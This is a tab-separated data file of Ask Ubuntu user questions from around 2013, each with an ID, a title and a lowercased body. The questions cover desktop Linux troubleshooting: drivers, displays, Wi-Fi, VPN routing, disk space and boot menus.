252882	how to connect xdmx and android xserver ?	i run : $ xdmx :1 -display 192.168.1.137:0 the output : ( ii ) dmx : generation : 1 ( ii ) dmx : dmx version : 1.2.20070424 ( dmx project ) ( ii ) dmx : dmx build os : linux 2.6.42-34-generic i686 ( ubuntu ) ( ii ) dmx : dmx build compiler : gcc 4.6.3 ( ii ) dmx : dmx execution os : linux 3.2.0-37-lowlatency # 37-ubuntu smp preempt mon jan 28 13:38:48 utc 2013 ( ii ) dmx : dmx execution host : alex-inspiron ( ii ) dmx : maxscreens : 16 ( ii ) dmx : using configuration from command line ( ii ) dmx : added 192.168.1.137:0 at 0 0 ( ii ) dmx [ o0/192.168.1.137:0 ] : name of display : 192.168.1.137:0 ( ii ) dmx [ o0/192.168.1.137:0 ] : version number : 11.0 ( ii ) dmx [ o0/192.168.1.137:0 ] : vendor string : open source ( ii ) dmx [ o0/192.168.1.137:0 ] : vendor release : 0 ( ii ) dmx [ o0/192.168.1.137:0 ] : dimensions : 1024x720 pixels ( ii ) dmx [ o0/192.168.1.137:0 ] : 1 depths on screen 0 : 32 ( ii ) dmx [ o0/192.168.1.137:0 ] : depth of root window : 32 planes ( 32 ) ( ii ) dmx [ o0/192.168.1.137:0 ] : number of colormaps : 1 min , 1 max ( ii ) dmx [ o0/192.168.1.137:0 ] : options : backing-store yes , save-unders no ( ii ) dmx [ o0/192.168.1.137:0 ] : window manager running : no ( ii ) dmx [ o0/192.168.1.137:0 ] : 1024x720+0+0 on 1024x720 at depth=32 , bpp=32 ( ii ) dmx [ o0/192.168.1.137:0 ] : 0x01 truecolor 32b 8b/rgb 256 0xff0000 0xff00 0x00ff * ( ii ) dmx [ o0/192.168.1.137:0 ] : dpms not supported ( ** ) dmx : dmxbecreatecolormap : no visual found ( ii ) dmx [ o0/192.168.1.137:0 ] : ( request ) s=1024x720+0+0 r=1024x720+0+0 @ 0,0 ( 0 ) ( be=1024x720 depth=32 bpp=32 ) ( ii ) dmx [ o0/192.168.1.137:0 ] : s=1024x720+0+0 r=1024x720+0+0 @ 0,0 ( be=1024x720 depth=32 bpp=32 ) ( ii ) dmx : using 1024x720 as global bounding box ( ii ) dmx : xsync batching with 100 ms interval ( ii ) dmx : shadow framebuffer support disabled fatal server error : no screens found how to locate the problem ?
252884	unity removed after installing kde sc 4.10	i wanted to try the new version of kubuntu desktop ( kde sc 4.10 ) on my ubuntu 12.10 , so i did this : sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update sudo apt-get install kubuntu-desktop installation went without problems , i ended unity session and logged into kde . but when i wanted to log back into unity , this option was n't there , there were just options gnome classic and kde . i found out that unity was somehow removed , so i tried installing it back on with sudo apt-get install unity , but i got this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity : depends : libunity-core-6.0-5 ( = 6.12.0+bzr2800sruubuntu0+808 ) but it is not going to be installed depends : libunity-protocol-private0 ( > = 6.12.0 ) but 6.10.0+bzr188sruubuntu0+152 is to be installed recommends : unity-lens-music but it is not going to be installed recommends : unity-lens-shopping but it is not going to be installed recommends : unity-lens-video but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried sudo apt-get -f install but it did nothing . i know that i 'm one of the few people , who want unity back instead of getting rid of it , but is there a way to fix this and bring unity back ? edit : i also tried sudo apt-get install ubuntu-desktop but i got a similar error , because one of its dependencies is unity , which can not be installed .
252887	touchpad is not working at all / no touchpad found in gigabyte booktop m1005 in ubuntu 12.10	`` touch-pad '' is not working at all or no 'touch-pad ' found in gigabyte booktop m1005 ubuntu 12.10 i have installed synaptic but it can not detect the touch-pad
252888	installation error on netbook with 12.04	i 'm trying to install 12.04 on an asus eee pc 1005pe with a usb stick . the installation starts normally , then it says it has encountered an error and takes me to a desktop where nothing works . i shut it down the hard way and tried again , same result . now it just goes to a cursor blinking on a black background . what went wrong and how do i fix it ?
252892	graphic card issue after fresh install of ubuntu 12.04 & 12.10 64bits	i am having a problem by which after i install ubuntu 12.04 64bit it shows that my display breaks and shows nothing . i tried ubuntu 12.10 64bit and it worked , but after updating it . the display breaks also . my machine system requirment is : - core i5 4gb ram 1.5 tb hardisk graphics : ati 6850 . my guess is that there is some sort of software incompatablity between the gaphics card and the system . either the driver or the kernal ? please advise me on how to fix it . and thanks .
252900	can not get outside vpn ( same settings work on debian )	background i have an openvpn server on my debian vps box . the purpose is to bypass firewalls ( my paranoid isp blocks tcp port 25 ) enable safe connection via untrusted networks ( mainly for portable machines , but you never know ) allow connection between peers ( for remote ssh/vnc troubleshooting ) i have authenticated and configured two clients ( so far ) , a debian squeeze laptop and an ubuntu 12.04 desktop to connect to this vpn . problem connection to the vpn itself works ok from both clients . but the the ubuntu box can not reach outside of the vpn ( not even using an ip address ) . both clients were set up using network manager , and only things i changed from default are that the tunnel uses tcp connection to port 110 . any tips where to look next ? data server.conf : port 110 proto tcp dev tun ca ca.crt cert myvpn.crt key myvpn.key dh dh1024.pem server 10.8.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt push `` redirect-gateway def1 bypass-dhcp '' push `` dhcp-option dns 10.8.0.1 '' keepalive 10 120 comp-lzo persist-key persist-tun status openvpn-status.log verb 3 route after connecting the `` bad '' box ( 89.x.y.z is my vps ) : destination gateway genmask flags metric ref use iface 0.0.0.0 10.8.0.5 0.0.0.0 ug 0 0 0 tun0 10.8.0.1 10.8.0.5 255.255.255.255 ugh 0 0 0 tun0 10.8.0.5 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 89.x.y.z 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 and the `` good '' box : destination gateway genmask flags metric ref use iface 0.0.0.0 10.8.0.13 0.0.0.0 ug 0 0 0 tun0 10.8.0.1 10.8.0.13 255.255.255.255 ugh 0 0 0 tun0 10.8.0.13 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 89.x.y.z 192.168.1.1 255.255.255.255 ugh 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 ( at the time of testing , both are in the same local net . ) and the vps : destination gateway genmask flags metric ref use iface 10.8.0.2 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 10.8.0.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 89.x.y.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 0.0.0.0 89.x.y.1 0.0.0.0 ug 0 0 0 eth0
252901	`` system is running in low-graphics mode '' , /dev/sdax partition full . how to delete content ?	i 'm aware of the this question and these are similar issues : how to fix `` the system is running in low-graphics mode '' error ? but i could n't figure it out entirely . what i did before the error : i accessed the tmp folder with nautilus ( sudo rights ) and changed the permissions so that possibly every process is allowed to write here ( that was probably very stupid ) . error analysis : as some posts suggest in the thread i did df -h : /dev/sda6 size : 7.4g used : 7.1g avail : 0 use % : 100 % mounted on / however , running rm ~/.xsession-errors and mkdir ~/.xsession-errors ( as suggested ) did not do anything ( multiple reboots inbetween ) . how can i check which file is so big to flood /dev/sda6 ( i have a hard time to cd there ) and how may i get rid of it ? i 'm not an advanced user so please bear with me if i used wrong vocabulary or can not see an obvious solution .
252904	steam not detecting the right amd radeon drivers on wine	i have recently installed ubuntu on my system , which has a amd radeon hd 7850 . the fglrx drivers installed just fine , and the system detects the right card ( pitcairn 7850 ) after playing with amnesia on native steam without encountering any problems , i 've decided to install windows steam using playonlinux . i 've installed the game counter strike global offensive , but when it boots it detects a ati radeon hd 3200 series and says that it does n't support the game , and then it crashes . here are the system info on steam : scheda video : driver non rilevato nome driver directx : ati2dvag.dll versione del driver non rilevata versione driver directx : 6.14.10.8681 data del driver non rilevata intensită colore desktop : 32 bit per pixel scheda directx : ati radeon hd 3200 graphics vendorid : 0x1002 deviceid : 0x9620 numero di monitor : 1 numero di schede video logiche : 1 nessuno sli o crossfire rilevato risoluzione visualizzazione primaria : 1920 x 1080 risoluzione desktop : 1920 x 1080 dimensioni visualizzazione primaria : 20.00 '' x 11.26 '' ( 22.91 '' diag ) 50.8cm x 28.6cm ( 58.2cm diag ) tipo bus primario non rilevato vram primaria : -2048 mb modalită msaa supportate : 2x 3x 4x 5x 6x 7x 8x i should also add that after it crashes the screen kind of `` shrinks in size '' : the desktop only fills part of the screen and i have to restart unity through the console .
252905	swap files slowing down games	i have a 16 gb alienware m17x , and every time i try to play a game the game will run perfectly for a minute or so but then the game starts to lag . now i believe this is a swap file problem . so does anyone know if a ssd drive or a 32 gb ram upgrade will fix this problem ? or alternately if there is another solution . thanks so much
252908	wireless signal drops on lenovo g series	this question was asked before , but it went unanswered so i thought i might give it a try and ask . i have a lenovo g series laptop which came with windows 7 64bit . i installed ubuntu 12.10 recently and i 've been having this problem with my wireless signal . i had this problem before , so i had stop using ubuntu . i got back into it , did a fresh reinstall of xubuntu 12.10 , and still have this problem . when i 'm near the router , i have perfect wireless signal . it 's at 100 % strength . as soon as i enter my room which ca n't be no more than 20 feet away , i lose signal . i lose my internet . and i ca n't connect again . i have my drivers up to date and my modem software is up to date too . my modem is one of those wireless modems , which has a built-in router inside . it 's a 2wire 2701 series . although i 'm still new to linux , i 'll try and post all the information needed to debug this problem . $ sudo lshw -c network *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : c1 serial : b8:70 : f4:43 : c6:04 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:40 memory:90100000-9013ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 74 : de:2b:3f:79:00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k ip=192.168.1.81 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:90000000-9000ffff $ sudo lsmod module size used by usb_storage 61750 0 bnep 18259 2 rfcomm 47865 4 bluetooth 219320 10 bnep , rfcomm parport_pc 32867 0 ppdev 17114 0 arc4 12574 2 joydev 17614 0 fglrx 5280770 108 uvcvideo 82215 0 ath9k 147066 0 videobuf2_core 36108 1 uvcvideo mac80211 583047 1 ath9k videodev 129966 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc snd_hda_codec_conexant 62409 1 snd_hda_intel 38509 6 kvm_amd 60123 0 ath9k_common 14054 1 ath9k snd_hda_codec 140413 2 snd_hda_codec_conexant , snd_hda_intel ath9k_hw 417454 2 ath9k , ath9k_common snd_hwdep 13669 1 snd_hda_codec snd_pcm 102478 3 snd_hda_intel , snd_hda_codec kvm 437135 1 kvm_amd snd_seq_midi 13325 0 ath 24124 3 ath9k , ath9k_common , ath9k_hw snd_rawmidi 30418 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 92376 0 snd 69534 20 snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 208484 3 ath9k , mac80211 , ath soundcore 12681 1 snd snd_page_alloc 18799 2 snd_hda_intel , snd_pcm microcode 23018 0 serio_raw 13216 0 sp5100_tco 13792 0 i2c_piix4 13505 0 k10temp 13174 0 ideapad_laptop 18597 0 amd_iommu_v2 19199 1 fglrx video 19468 0 sparse_keymap 13891 1 ideapad_laptop mac_hid 13254 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp atl1c 41886 0 if you need anymore information , please let me know . thank you for your time . edit : i forgot to mention , i have the latest 3.7 kernel .
252909	12.10 does not turn on ati display after resume using open xorg driver	i need to know how to manually turn the display on as this does not happen when i resume from a suspend . this is a laptop so it resumes from suspend every time i open the lid . it is painful to have to reboot ubuntu every time i close the lid . i am trying to use the open xorg driver . the proprietary fglrx driver works correctly on resume but has other problems . in particular the proprietary driver limits the maximum virtual display to 1600x1600 , which is not enough to drive a 1080x1920 display such as a television set . vga compatible controller : advanced micro devices [ amd ] nee ati beavercreek [ mobility radeon hd 6620g ]
252911	why ca n't i adjust the screen brightness ?	i have a toshiba satellite laptop with an amd 64-bit/radeon hd video card , running ubuntu 12.10 . i ca n't adjust the brightness from the default maximum , neither the fn keys nor the system settings slider change anything . i 've tried changing the default commands in grub , using grub_cmdline_linux= '' quiet splash acpi_backlight=vendor , reinstalling bash and directly changing the backlight value in /sys/class/backlight , but none of it works .
252917	how to make gtk spinbutton symbolic in 12.04 in only a specific application ?	i am currently developing an application for ubuntu 12.04 and ubuntu 12.10 systems . my application is completely monochromatic except for the spinbuttons as seen in the screenshot below . this issue is only persistent in 12.04 since in 12.10 the spinbuttons by default are monochromatic . how do i convert this into something like below , please state how to ensure this is local to my application alone since i do not want to be messing around with system files , users wont like that . how do this i solve this ?
252919	how do i combine two toolbar buttons into one ?	in my application toolbar , i have two toolbar buttons travel planner and departures as shown below , i need to change it this , as you can see in the 2nd image , it seems that 1 button has 3 actions combined in them . it is also similar to the gnome control center style . how can this be done ?
252920	how to get ubuntu vb guest to use monitor 's native resolution ?	i am running an ubuntu 12.04 virtualbox guest ( with guest additions installed ) within a windows 7 host . how can i set the resolution of the guest vb to match the physical machine 's native resolution ( 1280 x 800 ) ? iow , is there a way to add 1280 x 800 to the available options ? the highest resolution available under the system settings > displays that `` fits '' within the native one is 1024 x 768 , which gives an aspect ratio of 4:3 , whereas the native resolution gives an aspect ratio of 8:5 ( better known as 16:10 , for some reason ) . choosing this resolution means that a considerable portion of the screen is left unused ( which is a big deal when working with a tiny screen to begin with ) . all the other resolution choices available through system settings > displays give a 4:3 aspect ratio . ( e.g . there 's also a 1280 x 960 option , which does use the full width of the screen , but results in the loss of the bottom 160-pixel-high strip of the image . )
252925	ssd on ubuntu 12.10 much slower than on win7	i have ocz solid 3 120gb ssd with 500mb/s read & 450mb/s write speeds on my dell inspiron r15 . my primary os is ubuntu 12.10 ( fresh ) 32-bit . it runs fairly well , no freezes and overall performance is much better than on a hdd , however , just now i noticed that copying speed is much slower than on win7 . copying a 3gb file on win7 has around 130mb/s speed while on ubuntu it 's roughly 30-40mb/s . i 'm wondering why this is the case . i followed few guides which has to optimize an ssd on linux like adding `` discard , noatime '' to fstab , however , this has n't improved copying speed . it 's still under 40mb/s . any ideas how to solve this issue ? adhci enabled dual boot ( ubuntu 12.10 & win7 ) on the same ocz solid 3 ssd ( two partitions : a for ubuntu ; and b for win7 . no swap ) dell inspiron 15r i3-380m 6gb ram radeon 6560 1gb
252926	why does n't deleting files increase available space ?	recently i got a message about `` 0 bytes free '' on a certain partition . so i looked and , sure enough : $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 65190604 10920296 50959160 18 % / udev 966544 4 966540 1 % /dev tmpfs 389532 744 388788 1 % /run none 5120 0 5120 0 % /run/lock none 973828 152 973676 1 % /run/shm /dev/sda5 397327316 391010276 0 100 % /media/8b5e40d0-95b3-4e60-831c-e9b9aeadbfa4 there are 0 bytes available on that partition . so i deleted a bunch of files i did n't need on this machine , and emptied the trash . i expected the `` used '' to get smaller and the `` available '' to get larger by the same amount . but what actually happened was $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 65190604 10921184 50958272 18 % / udev 966544 4 966540 1 % /dev tmpfs 389532 744 388788 1 % /run none 5120 0 5120 0 % /run/lock none 973828 152 973676 1 % /run/shm /dev/sda5 397327316 390986836 0 100 % /media/8b5e40d0-95b3-4e60-831c-e9b9aeadbfa4 the `` used '' actually did get smaller , but the `` available '' is still zero . i rebooted the machine , and i still see 0 in the `` available '' column . why is `` available '' always zero , even when i delete a bunch of files so `` used '' gets smaller ? why does n't deleting files increase available space ? i am running ubuntu 12.04 lts . $ df -hi filesystem inodes iused ifree iuse % mounted on /dev/sda1 4.0m 512k 3.5m 13 % / udev 205k 486 204k 1 % /dev tmpfs 208k 390 208k 1 % /run none 208k 3 208k 1 % /run/lock none 208k 7 208k 1 % /run/shm /dev/sda5 25m 975k 24m 4 % /media/8b5e40d0-95b3-4e60-831c-e9b9aeadbfa4
252929	ctrl+alt+f8 pulls blank screen . what is this for ?	ctrl+alt+f1 through ctrl+alt+f6 will pull up terminals and ctrl+alt+f7 pulls up the xserver . but ctrl+alt+f8 pulls a blank screen with a blinking cursor . i ca n't type anything . does this serve a purpose ?
252932	wifi does n't work on lenovo b590 with broadcom bcm4313	my son bougt a laptop . i installed ubuntu 12.04 . first wifi worked fine now it keeps searching but ca n't connect . i tried some solutions but i think i need help . lspci -nn | grep 028002:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) these are the data . thanks !
252936	could not mount the partition wubi	i get this error when i use the wubi windows installer on windows 8 . it happens when i reboot , takes me to a dos screen . could not mount the partition /dev/disk/by-uuid/a
252941	perl regex : negate character class gives unexpected results	wondering if anyone else if having an issue with perl 5.14 on ubuntu 12.04 when it comes to negating a character class in perl . given the following small snippet while ( < > ) { print if / [ ^dd ] an/ ; } with the following small input dan frank steve daniel i would expect frank steve to be printed to the terminal instead i get frank only . just wondering if anyone else was having a similar issue and figured out what the problem was . i 'm going to search around for a bit and see if i can come up with anything i 'll update if i find anything cheers
252942	screenshot utilty keeps taking the same pictures . ( and using ffmpeg x11grab does the same )	the titles says it all . and this seems to happen a lot after installing steam . at least i think it 's tied into steam because i start getting odd artifacts when starting steam when . i do n't think i can describe . ffmpeg with x11grab seems to record just a still screen with a moving cursor . the windows `` stay '' even when moving the windows . hoping to update this as i find out more about what 's going on . i 've already reinstalled my gpu drivers with no results .
252954	how do i fix a problem with vlc that started after a window resize ?	today i had some windows open in workspace 1 and in the workspace below it i had vlc open . when i clicked on the vlc sidebar icon when i was in workspace 1 the window moved up to workspace 1 , but it was pushed far into the left of the screen of workspace 1 ( as in this question ) . i tried resizing the window ( since i was unaware that i could just alt+click to move it out ) to get it out of there and the window behaved oddly , changing orange as if it were maximizing , but the outline stayed the same . after that , if i recall correctly , i had to close vlc because it froze . now when i open vlc the outline of the window appears , but it never gets to the point of functionality . the outline flickers , and when i mouse over menus or sidebar icons they appear and do n't go away . the first time it happened , i got a popup window that said compiz crashed , and i think i can safely assume that was the reason the borders disappeared from all the windows of all open programs . i 've looked up some related issues through regular bug reporting channels , and i have a feeling something like this would n't get fixed anytime soon . not that i mind filing a bug report , mind you . my question is : since i ca n't use vlc right now , and i 'd really like to , is there any way i can delete or reset vlc 's window position data ? i have good reason to believe that it 's only vlc on my machine that is affected by this bug , so fixing this data , wherever it is , will likely fix the problem . i just do n't know how to find it .
252958	broadcom driver woes	-- edit -- ( in case i need to see this again ) after a clean install this worked : your device uses the driver b43 and proprietary firmware . the broadcom sta driver which provides wl is not appropriate . please get a temporary wired ethernet connection and do : sudo apt-get remove -- purge bcmwl-kernel-source if it is n't installed , just proceed . sudo apt-get install linux-firmware-nonfree sudo modprobe -r b43 & & sudo modprobe b43 you should be all set . -- thank you guys ! ! tried using the additional drivers gui and that did n't work . tried using jockey-text -- list kmod : wl - broadcom sta proprietary wireless driver ( proprietary , disabled , not in use ) [ auto-install ] tried using jockey-text -- enable=kmod : wl this was the response sorry , the installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log from the log file : 2013-02-09 00:49:57,904 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : enabled , b43legacy : enabled 2013-02-09 00:50:05,572 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-02-09 00:50:05,572 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-02-09 00:50:05,600 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : enabled , b43legacy : enabled now it looks and feels like i 'm doing everything right and the similar searchs seemed to suggest doing what i 've done , so what am i doing wrong and how does one enable this driver ? second to last line of the log suggests the file or directory is missing , is there somewhere i can get a linux broadcom driver from to put in that directory ? if it 's missing why is it in the list ? please help , while the graphics driver is only partially supported it has given me the right resolution , and everything runs without crashing ( but the system information says it 's an unknown graphics card , i can live with that ) but without the wireless card working i have sit really close to the router thanks to a very short cable ... hopefully i 've given enough information , please send linux.ninjas to help . -- ok , used . lspci|grep network not sure if that would give differentt results but i got 01:00.0 network controller : broadcom corporation bcm4311 802.11b/g ( rev 01 ) so then used iwconfig and got lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions -- after @ chili555 advice i did sudo apt-get remove -- purge bcmwl-kernel-source but got e : dpkg was interupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . when i do it runs ok , but then crashes and freezes . halway through it says that it 's fixing recurrent problems but needs rebooting , then gets to a line `` end of trace '' and thats where it halts .
252959	how can i get gcc 4.7 installed on precise ?	the latest version of gcc in the precise archives is 4.6.3 . however , gcc 4.7 adds support for some newer c++11 features ( like delegating constructors ) . quantal 's package archives have gcc 4.7.2 available . is there any way i can get gcc 4.7 installed on precise ? better yet , is there an easy way to take a newer version of a package in one release and backport it to an older release ?
252961	faience icons for battery indicator	i 'm using the faience azur icon theme , and my battery indicator displays ugly icons when the computer is plugged in and at some other times too : ( i 'll add more problematic icons when i see them ) i 've seen several questions about linking in battery icons from other themes , but looking at the theme , i see that a great icon already exists for a plugged-in battery : i also see a bunch of battery icons prefixed with xfpm and gpm . i assume the reason the battery indicator does n't show some icons correctly is because the icon for that status is incorrectly named and the indicator does n't recognize the name . how do i correctly set up the battery indicator to use icons from the faience theme ?
252962	is there a desktop-neutral gksudo ?	there are various tools for various desktops that aim to run a graphical application as root . gksudo , kdesudo , empower , etc ... but what if i 'm writing a script that could be used on any linux desktop ? is there an xdg-sudo of some sort.. ? a standard for getting sudo access in a desktop environment ?
252966	twitch.tv video full screen opens on different monitor ?	i have a nvidia evga geforce gtx 680 and i am running three monitors off of it . whenever i watch the live streams on twitch.tv and i want to watch in full screen via the little button on the bottom of the video , the full screen opens on a different monitor than the window it was running in inside of firefox . videos on youtube.com and the like open on the same monitor and are not a problem , it is only twitch.tv . is there any way to fix this ?
252970	ca n't un-tar libreoffice 4 download	i 've tried this guide how do i install libreoffice 4 ? but i get this message can someone please explain why this is happening ? and can someone tell me how to download it ?
252973	new to ubuntu . how do i access my files ?	my laptop is running windows 8 pro ( upgraded from windows 7 ) . i decided i wanted to try a new os so here i am . i 've installed ubuntu using the wubi.exe installer . when i boot my laptop , i get given a choice of windows 8 or ubuntu . cool , just what i wanted ! i want to try ubuntu for a few weeks or so to see if i prefer it over windows . but for now , i want to keep w8 so i decided to go for this dualboot/run alongside option . only thing is , my files . i have a lot of music , pictures , movies , tv shows and documents on my 500gb hdd which i make use of daily . but i can not seem to find out how to access them in ubuntu . that 's all i want ; ) any help would be appreciated ! thanks for your time . ( i 'm not a computer tech geek , i 'm just an avid computer and internet user , i 'm a noob at this sort of thing . )
252975	synaptics : no touchpad found	no touchpad found no touchpad was found in this system . if the system has a touchpad , please make sure that the synaptics driver is properly installed and configured . if your touchpad is not found , though the driver is installed and configured correctly , please compile detailed information about your touchpad hardware and report this issue to the issue tracker . touchpad not working on toshiba c650 . i have ubuntu 12.04 installed . right click works , nothing else . any ideas about this ? guess i am looking for synaptics touchpad drivers .
252977	what is the difference that explains different results of different ways to assign values in a command-line ?	what is the difference that explains the different results of these commands ? a=2 echo $ a set a=2 echo $ a a=2 ; echo $ a set a=2 ; echo $ a
252979	the system is running in low-graphics mode	i am getting the error âthe system is running in low-graphics modeâ error on my pc . its and hp pc with integrated graphics card . it was running fine until yesterday . trying to switch to gdm just boots up with my usual background and a computer icon in the middle of the screen but i can not do anything not click it and not login . i have tried the solution in the next thread : how to fix `` the system is running in low-graphics mode '' error ? i have tried to : 1. sudo apt-get install -- reinstall ubuntu-desktop 2 . verified greeter-session=pantheon-greeter 3 . have tried switching to gdm 4 . have checked i have enough free disk space 5 . installing a new intel driver from x-swat repository 6 . reinstalling xserver-xorg any help would be great . thank you
252981	boots only in recovery mode after update ubuntu 12.04	uhm , i need help , after performing software updates , and restarting my laptop as requested , i can no longer boot normally , i am currently posting this question using recovery mode . when i try to boot normally , it reaches the log in screen after which , when the desktop is supposed to load , it does n't . i can move my mouse but cant click on any icons what so ever .
252983	ca n't update ubuntu	on the ubuntu website , it says that if i want to update ubuntu from 12.04 lts to 12.10 , i have to go into update manager and click 'check ' , which wo n't work . it pops up saying , `` there are no updates to install , '' or , `` the software
252987	replacing main os in multiboot system with windows and other linux distros ?	i have windows xp , windows 7 , and several linux distros installed on different partitions . i would like to replace my main linux installation ( an earlier version of ubuntu ) with a newer one . this installation manages the boot menu ( grub2 ) for the other systems . how do i do that without losing the ability to boot into windows and other operating systems ? the grub does need to be replaced with a newer version ... i am trying to figure out how to do that without destroying my computer .
252988	ubuntu 12.10 : ca n't set keyboard options with xorg.conf	i created a file /usr/share/x11/xorg.conf.d/90-keyboard.conf containing section `` inputclass '' identifier `` defaults '' matchiskeyboard `` true '' option `` xkboptions '' `` ctrl : nocaps , compose : menu , terminate : ctrl_alt_bksp '' endsection it looks like it 's getting picked up ; in /var/log/xorg.0.log it says [ 3772.382 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 10 ) [ 3772.382 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 3772.382 ] ( ** ) option `` xkb_model '' `` pc104 '' [ 3772.382 ] ( ** ) option `` xkb_options '' `` ctrl : nocaps , compose : menu , terminate : ctrl_alt_bksp '' but it has no apparent effect ; caps lock is still caps lock . am i missing something obvious ?
252990	new motherboard , atheros ar8161 not recognised . how to install drivers ?	i just purchased a gigabyte 78lmt-2sp with a atheros ar8161 . ubuntu does not recognise the nic ? how can i isntall the correct drivers with no internet connection . i have followed other tutorials on here with no luck ...
252991	bluetooth headset connects , but provides no audio input option	i have a bluetooth headset that i would like to use with skype . it used to work perfectly a few ubuntu versions ago . then one day it stopped working , and it seems there were kernel bugs or something . i gave up on it for maybe half a year or more . recently , i thought i 'd give it another go . on the upside , my headset seems to connect to my computer without any trouble : however , when i open skype , it does not see the headset at all . there is only one pulseaudio option , which is network sound server , not my headset . the bluetooth headset also does not seem to appear anywhere in my sound settings . how do i get skype to recognize my bluetooth headset ?
252992	why ca n't i get ubuntu to work on my g5 powermac ?	i 've been trying to get ubuntu to work for literally days now on my new g5 powermac . i 've read up on some things but i 'm new to macs . i 've downloaded the iso file and burned it to a cd using diskimage . when i restart and hold down c , i just receive a huge spam of white words on a black background ( similar to a terminal ) . then the screen becomes white . the white screen remains displayed for about a minute or two and then my cd drive ejects , the screen turns blue , and the display shows a file with a question mark on it . then mac os x loads . i am running the earlier version with the 5200 graphics card , which apparently leads to a `` phantom port '' issue . i 'm new to this . also , i am not using a mac keyboard .
252993	run unity on external monitor with bumblebee	i realise there are lots of other questions about this , but they are all about the basic setup . i have gotten most of the way there but i have a very specific question : i want to run full unity on the external ( hdmi ) monitor , and i do n't care if the laptop display is unusable . i have a dell xps 15 with nvidia gt 540m with optimus . ( damn optimus ! ! ! ! ) i have bumblebee installed . i am able to run the system on the laptop display , and i can use optirun to run programs like glxspheres in high-performance mode . when i plug in the external monitor , i see nothing , and xrandr does not detect it ( `` hdmi1 disconnected ( normal left inverted right x axis y axis ) '' ) . here 's what i 've done so far ( working from bumblebee 's multi-monitor setup guide ) . i followed the `` extra screen '' advice there , so i have edited bumblebee.conf and xorg.conf.nvidia as instructed . now , if i run : export display=:8 ld_library_path=/usr/lib/nvidia-current : $ ld_library_path optirun glxspheres i see the glxspheres demo on the external monitor ( without any window dressing ) . woohoo ! now the next step is to shut down unity on the laptop display and test that glxspheres still works . so i hit ctrl+alt+f1 to go to the non-graphical terminal . then : sudo service lightdm stop export display=:8 ld_library_path=/usr/lib/nvidia-current : $ ld_library_path optirun glxspheres again , i see glxspheres on the external monitor . now the bumblebee guide tells you to do `` optirun wmii & ( or other like startlxde ) '' but i do n't want to change to another window manager . how can i run unity on the external monitor ? i tried optirun unity and i got most of the way there . this starts up unity on the external monitor . i can see the desktop , and the mouse works . i can run other programs inside unity . there are just a couple of problems : certain keyboard combinations do n't get detected by unity -- looks like anything involving ctrl as well as the fn key . ( e.g . : ctrl+alt+t did n't work to get a terminal ; fn+f11 did n't work to change the volume . ) keyboard strokes appear in the terminal as well as unity . i do n't want that since there may be passwords being typed . if i switch to another screen ( e.g. , ctrl+alt+f8 ) , the audio stops working , so this is not a viable solution to # 2 . i feel like these three issues are related . i think the main problem is that i should n't be directly running unity , but instead , running lightdm . i 've tried optirun lightdm but it does n't work at all . hoping someone knows . if not , hopefully at least this question will help people almost-run unity on an external monitor .
252996	how to make grub remembers what i boot last time ?	i am having windows and ubuntu installed side by side . so every time when i boot ( when the grub menu appears ) i have to press down key to select a specific os . i want to edit the code of grub so that it remembers what i boot last . like if i boot ubuntu last time , then by default selected option will be ubuntu in menu , similarly for windows .
